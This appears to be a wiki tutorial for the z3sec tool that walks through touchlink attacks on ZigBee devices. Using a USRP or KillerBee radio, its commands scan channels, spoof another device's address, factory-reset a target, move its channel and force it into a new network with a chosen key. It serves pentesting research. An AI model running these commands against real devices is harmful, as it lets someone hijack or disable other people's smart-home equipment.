-
Notifications
You must be signed in to change notification settings - Fork 19
Tutorial 1: Touchlink Attacks
In the following, we present instructions to pentest ZigBee-certified devices that support touchlink commissioning.
We assume the usage of an USRP as radio transceiver. If you are using a KillerBee radio (e.g., connected to /dev/ttyUSB0), please substitute --sdr with --kb /dev/ttyUSB0.
First of all, connect the USRP to your host computer. To check if the USRP is connected correctly, run following command:
$ uhd_find_devices
The output should look like this:
--------------------------------------------------
-- UHD Device 0
--------------------------------------------------
Device Address:
type: b200
name: MyB200
serial: 30DCE93
product: B200
Scan all ZigBee channels for touchlink-enabled devices:
z3sec_touchlink --sdr -c all scan
If you find a touchlink-enabled device, the output looks similar to the following:
Scan responses overview:
# |RSSI |channel |src_pan_id |src_addr |
=======================================================
0 |0 |20 |0xe21 |00:17:88:01:10:4f:44:e8 |
Alternatively, you can scan just specific channels (e.g., channel 20) via:
z3sec_touchlink --sdr -c 20 scan
If you cannot find touchlink-enabled devices, try the following:
- Check if the touchlink-enabled device is supplied with power
- Move the radio transeiver closer (less than a meter) to the target
- Experiment with different TX gain and antenna settings
- Repeat the scan multiple times
To trigger the identify action of the touchlink-enabled device with the extended address 00:17:88:01:10:4f:44:e8, please run following command:
z3sec_touchlink --sdr -c 20 identify --target 00:17:88:01:10:4f:44:e8 -d 15
This command scans for devices on channel 20, and if the specified target was found, triggers the identify action for 15 seconds.
If the triggering of the identify action does not work, please follow ACK Spoofing instructions.
An exemplary command triggering the identify action of a touchlink-device on channel 20 for a duration of 15 seconds, while spoofing another ZigBee device that is within the wireless range:
z3sec_touchlink --sdr -c 20 --src_pan_id 0xABCD --src_addr_ext 00:17:88:01:00:ed:5c:30 identify --target 00:17:88:01:10:4f:44:e8 -d 15
This command spoofs another ZigBee device that does not necessarily supports touchlink commissioning. In our example, the spoofed device has the PAN ID 0xABCD and the extended address 00:17:88:01:00:ed:5c:30. Please note that the impersonated device needs to be within ZigBee range of the target device.
To reset a touchlink-enabled device to factory new, please run following command:
z3sec_touchlink --sdr -c 20 reset --target 00:17:88:01:10:4f:44:e8
This command scans for the target device on channel 20, and if it was found, resets the device to factory-new.
Afterwards, it is checkd if the reset was successful.
To change the channel of a touchlink-enabled device, use following command:
z3sec_touchlink --sdr -c 20 update --target 00:17:88:01:10:4f:44:e8 --channel_new 26
This command scans for the target device on channel 20, and if it was found, switches the channel of the device from 20 to 26.
Please note that this attack requires knowledge of the ZLL Master Key. Please provide this key in ~/.config/z3sec/touchlink_crypt.ini.
To join a touchlink-enabled device to another network, please run following command:
z3sec_touchlink --sdr -c 20 join --target 00:17:88:01:10:4f:44:e8 --channel_new 26 --addr_new 0x1234 --network_key A0A1A2A3A4A5A6A7A8A9AAABACADAEAF
This command scans for the target device on channel 20, and if it was found, joins the device (now referred to under address ´0x1234´) to the network with a random PAN ID on channel 26 and sets the network key to 0xA0A1A2A3A4A5A6A7A8A9AAABACADAEAF.